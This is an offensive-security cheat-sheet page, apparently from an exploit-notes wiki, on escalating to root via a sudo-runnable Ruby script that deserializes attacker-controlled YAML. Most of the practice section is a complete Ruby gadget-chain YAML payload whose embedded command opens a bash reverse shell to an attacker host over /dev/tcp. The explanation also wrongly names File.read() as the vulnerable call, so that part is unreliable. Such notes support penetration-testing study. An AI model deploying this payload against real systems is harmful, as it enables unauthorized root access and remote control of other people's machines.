Ruby

Theory

Ruby scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, ruby scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

Practice

YAML Code Execution

Assume the ruby script can be executed as root with sudo rights. If it use the File.read() method and we controll its input, then the script is vulnerable to arbitrary code execution.

sudo -l
    (root): /usr/bin/ruby sample.rb

Check if we have control over the input of the vulnerable function

File.read(’sample.yml’)

If we controll some variables passed to this vulnerables functions, we can inject arbitrary code. here is an example of a malicious sammple.yml file passed to the File.read() function:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve

References

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ruby-privilege-escalation/exploit-notes.hdks.org

Last updated 2 years ago

Was this helpful?